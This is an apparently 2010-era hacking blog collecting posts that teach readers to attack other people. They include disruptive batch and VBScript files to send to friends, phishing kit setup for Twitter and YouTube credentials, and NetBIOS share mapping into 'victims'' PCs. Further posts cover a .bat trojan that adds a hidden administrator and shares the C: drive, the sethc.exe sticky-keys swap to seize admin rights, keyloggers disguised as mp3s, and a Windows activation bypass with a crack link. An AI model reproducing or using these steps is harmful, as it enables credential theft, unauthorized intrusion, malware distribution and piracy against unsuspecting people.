Chemistry World

Friday, May 21, 2010

0 Destroy your enemy pc by mailing



------------------------DO THIS IN YOUR OWN----------------- ----------------------------RESPONSIBILITY----------------------



1)


Convey your friend a lil’ message and shut down his / her computer:
Type :
@echo off
msg * I don’t like you
shutdown -c “Error! You are too ******!” -s
Save it as “Anything.BAT” in All Files and send it.


2)


Toggle your friend’s Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.


3)


Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.


4)


Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.


5)

Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(”WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! ”
Save it as “Anything.VBS” and send it.


6)

Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as “Anything.VBS” and send it.


7)

Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as “Anything.VBS” and send it.
8. Open Notepad continually in your friend’s computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “Anything.BAT” and send it.


9)

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as “Anything.BAT” and send it.


You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the ‘Change’ Icon and change the icon from there.



DO THIS IN YOUR OWN RESPONSIBILITY.PLZ DON'T HARM ANYONE.
Read More...

0 Bat_To_Exe_Converter for Virus coding purpose



This one of the new technology.Today i am here to inform all of u about a converter
We create virus but the format of it couldnot fullfill our desire.So I come here to inform you that the solution have arrived.Download the converter and get pleased.But never harm anyone..........





Download it


Create it for good

Read More...

Thursday, May 20, 2010

0 How to rename recycle bin


............................................................................................................................................................

How to rename recycle bin

Many people asked me to write a post about on Registry hacks,so here is the post on "How to rename recyclebin"

You can rename recycle bin by following method:


1-Click Start menu > Run > and type “regedit” (without quotes), to run Windows Registry Editor
2- Find and go to following “HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}”
3- Change the name "Recycle Bin" to whatever you want


Please Note :Incorrectly editing the registry may severely damage your system.

Read More...

0 How do i change my ip address


Atfirst we have know What is an ip address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 127.0.0.1.

Since these numbers are usually assigned to internet service providers within region-based blocks, an IP address can often be used to identify the region or country from which a computer is connecting to the Internet. An IP address can sometimes be used to show the user's general location.


How do i change my ip address-method



"How do I change my IP address?" and "Can I change my IP address?" are probably the most commonly asked questions

Here are simple steps to change your ip-address:

1. Click on “Start” in the bottom left hand corner of screen

2. Click on “Run”

3. Type in “command” and hit ok

You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”

5. Type “exit” and leave the prompt

6. Right-click on “Network Places” or “My Network Places” on your desktop.

7. Click on “properties”

You should now be on a screen with something titled “Local Area Connection”, or
something close to that, and, if you have a network hooked up, all of your other
networks.

8. Right click on “Local Area Connection” and click “properties”

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the”General” tab

10. Click on “Use the following IP address” under the “General” tab

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2
until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section
with default numbers.

13. Hit the “Ok” button here

14. Hit the “Ok” button again

You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings

17. This time, select “Obtain an IP address automatically”
tongue.gif

18. Hit “Ok”

19. Hit “Ok” again

20. You now have a new IP address


.......
Read More...

0 How to hack twitter accounts

..............................................................................................................................................................
Hack twitter accounts

TWITTER is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts

Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing


How to hack twitter accounts - Phishing



First of all download:Twitter fake login page

Step 1
First extract the contents into a folder

Step 2
Then edit login.php .(right click and then select edit)

In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.

Now rename the script to pass.php and save it

Step 3
Now open twitter fake page in wordpad and seach for the term action=,Change action=pass.php

Step 4
Create an id in www.110mb.com , because i know about that site quite well.

Step 5
Then upload the contents into a directory

Step 6
For that,after creating an id you should go to file manager and upload all these files.

Step 7
Then just go to your fake page and enter user name and password and try out whether its working .

Step 8
After you type the file , a password file will be created in the same directory .

Step 9
Then you can see what username and password you have entered.

Now you are ready to hack twitter accounts

Step 10

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

Weak Password Brings ‘Happiness’ to Twitter Hacker


...................................................
Read More...

0 How to increase your intenet speed

Increase internet speed

The following post is on How to increase your internet speed,I will show you some ways to increase your net and browser speed

Go to Start>>Run and then type in “gpedit.msc” without the quotes (“)

Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler.
after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled”, or you can put it to “Enabled” and change the value to 0.

Now this will increase your internet speed by 20%




Increase internet speed - method 2



Below combination will speed up your surfing on the net. it is amazingly fast.

Firefox + IDM + TCP Optimizer


Plz do a speed test of your net connection before & after at http://speedtest.net to know what difference this software has made.


1) Speed Up the Firefox.


just do the following.


* Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests




* Alter the entries do as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30.

* Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".

Method 3

Now Download & Install IDM. ( The Best Download Manager I've ever used. )

CLick here
to download



TCP OPTIMIZER DOWNLOAD



When u open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' & apply the changes.
In the next box, press OK and reboot.
Read More...

0 Hacking into another persons computer



Step 1
First of all,get a good IP scanner angry ip scanner is a good one you can get it here:
Angry ip scanner Download

Step 2
Now click on start and then goto run and then type there "CMD" and press ok

This is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace

an ip address of the victims computer

c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find another victim.

Step 3:

Type down:

c:\windows>net view \\255.255.255.255

If the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere


Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive.


Now type:
c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.


Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.

Read More...

0 How to hack into a computer - Netbios hacking



So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross


Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.



It should begin to scan.

Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.



Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):


IF it didn’t work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

How to hack into a computer - Step 2
--------------------------------------------------------------------------------------------------

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.




Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP ofthe computer you are going to break into.


The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup


How to hack into a computer - Step 3


Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”



We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different target.



As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly creatednetwork drive should be there.




Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to thenetwork . So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know ifthe target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!



Congratulations! You’ have hacked into the victims computer
But, before you leave, please look over some of this information for further help and just for thanks to me.

Commands used in this tutorial:

PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)

Warning:This post How to hack into a computer is truly for educational purposes

Read More...

0 Bypass rapidshare download timer:Rapidshare hack


In my last a article How to get a free rapidshare premium account I told you a method get hack rapidshare premium account,Today i thought of posting some more rapidshare hacks,So today my post is on How to bypass rapidshare download timer,It gets so annoying when we keep waiting for the rapidshare timer


The count down timer:

This is one of the best method to bypass rapidshare download timer.

1. Click the RapidShare download link

2. To start the download click on the free button at the bottom of the screen.

3. Copy and paste this code in to the web browser url bar:

javascript:alert(c=0)


You can also bookmark this by doing the normal bookmark/fav process and then just entering that code instead of the website.

4. Press enter

This should set the timerlimit to zero. it is also possible to Add that link to your Favorites/bookmarks.

Read More...

0 How to hack yahoo messenger password

.............................................................................................................................................................. Hack yahoo messenger


Everyday I get a lot of emails from people asking How to hack a Yahoo password? So if you’re curious to know how to hack a yahoo password then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password.
There are number of sites on the web that provide information to hack a Yahoo password. So what’s special about this site? The only special about this site is that we do not bluff and mislead the readers. We actually teach you the real and working ways to hack a Yahoo password rather than telling some nonsense tricks to crack or hack some one’s yahoo password.


Using keylogger is the easiest way to hack a Yahoo messenger password. Any one with a basic knowledge of computer can use a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer. The following are some of the frequently asked questions about keyloggers.


1. What is a keylogger?
A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.


2. Where can I get the keylogger?
There exists hundrends of keyloggers on the internet. But most of them are of poor quality and fail to deliver a good performance. The two best keyloggers for hacking yahoo password are listed below.


1.SniperSpy (Supports Remote Installation)
2.Win-Spy (Supports Remote Installation)


3. Which keylogger is the best to hack Yahoo password?
Both the above mentioned ones are best for hacking Yahoo. However I recommend Sniperspy since it is more reliable and has got a better advantage over Winspy.
If you’re really serious to hack a Yahoo password then I strongly recommend using either of the two mentioned keyloggers.


OTHER WAYS TO HACK YAHOO PASSWORD
The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.
Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & password) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.
However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo. Because Keyloggers are the easiest way to hack Yahoo password.
I have made a post on Hack yahoo using fake login page,kindly check it out
Read More...

0 How to Create a trojan in .bat file

 ..............................................................................................................................................................
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.
In this post i will tell you How to create your own trojan horse in a .bat file,Helping you to hack into another persons computer.I had previously  posted a tutorial on How to sent a trojan as a txt file but this post will explain you creating a Trojan in a .bat file to infect a Remote computer.

Creating a Trojan in a .bat file - Procdure

1.Go to start and click on run and type cmd

2.Now insert this command: net

And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.

Open notepad and write there:


dir
pause


And now save this as test.bat and execute it.

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know which version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access. 


Hope you  liked the post! Pass the comments
Read More...

0 Download video from youtube with out software

..............................................................................................................................................................
Here is the easiest way to download any video from Youtube.

While playing the video on youtube.com, Copy its location from the address bar like www.youtube.com/watch?v=sasad7657dms2

then add the word ‘kick’ between www. and youtube.com/link…….

EXAMPLE: www.kickyoutube.com/watch?v=sasad7657dms2

That’s it, Download without any other software or going to any other site, as their are many but this method is the best one according to me. Enjoy :)
Read More...

0 How to hack youtube account - Phishing

Learn how to hack a youtube account
Are you curious to "hack youtube accountt" well then this post is just for you,Most people ask me to tell us the easiest way to hack youtube,so here is the most easy way to hack you account i.e. phishing

Today we will focus on the easiest way i.e Fake login page
A
Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmailyoutube,friendster etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.






How to hack youtube account - Phishing




First of all download:Youtube fake login page
[image_thumb[2].png]
PROCEDURE:
1.once you have downloded youtube fake login page,now extract contents in a folder
2.In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.
Save it .
3.Open Fake page in wordpad
4.Now press ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com , because i know about that site quite well.

6.Then upload the contents into a directory

7.For that,after creating an id you should go to file manager and upload all these files.

8.Then just got to youtube.htm and try out whether its working .
After you type in the file , a password file named pass.txt will be created in the same directory.Then you can see what username and password you have entered.

Read More...

0 How to delete undetecteble file in windows xp

..............................................................................................................................................................

TOday ill tell u how to delete undetecteble file on XP. They are not deleted simply and a message appears that "access denied" There is a simple way to delete those files. Read this carefully.

Click on Start, Search, All Files and Folders.

Right-click on file and choose properties

file location example: c:\windows\system32\undeleteablefile.exe


Open a Command Prompt window

Again Click on Start button, Run and type TASKMGR.EXE and press Enter to start Task manager
Click on the Processes tab, click on the process named Explorer.exe and click on End Process.

Minimize Task Manager.

Go back to the Command Prompt window and change to the directory where the file is located. To do this, use the CD command.

cd \windows\system32

Type DEL where is the file you wish to delete.

Example: del undeletablefile.exe

Go back to Task Manager

In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.

Close Task Manager and the file is deleted.
Read More...

0 Make windows genuine in a minute

.............................................................................................................................................................
Make windows genuine
Make your Windows XP with Service Pack 2 geniune. Im not sure if this works on SP3.

This procedure described below will allow you to bypass the Microsoft Genuine Validation.
I hope this is the best way to make your copy of windows xp geniune.



Step 1:
 Click Start and then goto run and type ‘regedit

Step 2:
Registry window will be opened, Then Go to
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer


…and double click on it. Then change some of the value data to ANYTHING ELSE…delete some, add some letters, I don’t care…just change it!

Step 3:

Go to start > run > “%systemroot%\system32\oobe\msoobe.exe /a” (again, dont type the quotes)

Step 4:

The activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.

Now you can download all the updates without activating, and the Genuine Microsoft Validation will **** you No more.

Note: This works better after reformat

Or else do you want to download the cr@ck for XP,XP home,XP 2, Vista..
i am placing it in a zip folder pls download it from the below link

http://rapidshare.com/files/71090926/Crack_For_XP.rar
Read More...

0 Hack administrators password through guest login

Learn to hack administrators password through guest login
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on...

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.


Procedure To Hack windows XP administrator Password

Method 1 (Change Admin Password)

Here is how to do that -

1.Go to
C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename
cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.

6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “
NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.

8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.

9.Congrats You have
hacked admin through guest account.
Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where "
How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to
registry editor and navigate to this key




HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList


Here create a new "
DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever :)
Note:For the ones that are having problems with step one: What I would do because you do not have write access to the directory you can use a live version of Linux. Copy the cmd.exe to a flash drive. Boot into Linux and copy the cmd.exe to the file that needs to be replaced. In Linux you can bypass those read/write permissions.

Read More...

0 List of 10 best Facebook hacks

In my last previous post  How to hack facebook password,I told you a method to hack a facebook password,i now though to continue the series of facebook hacks,
As you know Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.






List of best 10 facebook hacks


1.How to View the Album of Any User Even if it is Private
You can use this script to view a photo in the original album, even if you’re not friends with the person.

Get it Here

2. How to Remove Annoying Facebook Advertisement
Get rid of some of the Facebook advertising and sponsored by sections with this tool.

Get it Here

3. How to see Real Profiles from Public Pages
This script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.

Get it Here

4. How to Undo Facebook Changes
If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.

Get it Here

5. How to View All the Photos from a Person
You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.

Get it Here

6. How to Find More Friends at Facebook
Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.

Get it Here

7. How to Share Files from Facebook
With this box widget, you can share files from your computer through Facebook. Isn’t it great?

Get it Here

8. How to Get a Job from FacebookLooking for a job?
This application gives Facebook users unique access to job information, networking opportunities and other career resources.

Get it Here

9. How to Tighten up the Privacy and still Maintain Communication Convenience
The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.

Get it Here

10 How to Cheat Facebook Texas Hold em Poker
This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.

Get it Here

.......
Read More...

0 Hack Facebook,hotmail and yahoo account



I get numerous email from readers asking me to tell them the easiest way to hack Facebook,hotmail and yahoo account,Many of these people claim that they have lost their passwords because they have been hacked and now need to get their password back.so today i have decided to compose a post explaining the ways to hack yahoo,aol and hotmail account




Hack Facebook,hotmail and yahoo account - Methods


Phishing:
This is one of the most popular way to hack Facebook,hotmail and yahoo account,In this method the hacker creates a fake page which exactly resembles to the original page,when the victim enters his email address or password it is saved in a txt file.
I have also posted a way to Create a fake login page for any site,just check it out


Keylogging:
A keylogger, sometimes called a keystroke logger, keylogger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack a Facebook,hotmail and yahoo account if you have physical access to victim’s computer.


Post related to keylogging:
1.
Keyloger to hack passwords
2.
Hack an account using keylogger
3.
Hack gmail account using keylogger
4.
How to install a keylogger remotely
5.
How to bypass keylogger antivirus detection





IMPERSONATION
It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you login to the MSN® service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. The user could be fooled into submitting information to the hostile website. For instance, consider the effect of seeing the following window:



SNIFFING:
If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if twopeople are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.

BRUTE-FORCE ATTACK:
Many people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on Facebook,hotmail and yahoo accounts and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don't own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you'd be arrested and prosecuted for doing this.
Know more about Brute force attack

SOCIAL ENGINEERING:
Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that manypeople can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number ofpeople would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate
customer service representative will ask for this information.
Read More...

0 How do i block and unblock internet sites


Learn to block and unblock internet sites
Some times it becomes necessary to block and unblock internet website on our Computers for one or other reason.


  • Go to Start and type RUN .
  • Type C:\WINDOWS\system32\drivers\etc
  • Open the file "HOSTS" in a notepad
  • Under "127.0.0.1 localhost" . Add IP Name
    IP - IP of the site to be blocked
    Name - Name of the site (see the pic below for example

Example :
127.0.0.1 localhost
210.210.19.82 www.sifymall.com

Sifymall is now unaccessable . For every site after that you want block , just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
Read More...

2 Hack hotmail password using a keylogger

In my last article Keylogger to hack passwords i mentioned about aradamax keylogger and its features,today i found another keylogger to hack hotmail passwords.This free keylogger software, too, is currently FUD(Fully undetectble) and used to hack any hotmail password. I will demonstrate how this free keylogger can hack a hotmail password,This keylogger can also be used to hack gmail passowrds,but in this article i will tell you to hack a hotmail password with this keylogger


Hack hotmail password using a keylogger - Method


1.First of all Download free keylogger


2.Now extract all contents in to a folder


3.Run easylogger.exe file and you will see this:



hack hotmail


4..Now, fill in your Gmail username and password in respective fields. Enter the email address where you wanna receive windows live passwords. You can set timer as you wish. This timer controls the time interval between two logs emails. Now, hit on "Build" and you will get server keylogger file named "Your logger.exe" created in current directory.


5.Now to hack a hotmail password you need to make victim install this file 
on his/her computer,you can also bind it with a mp3 file with a binder,to fool your victim.


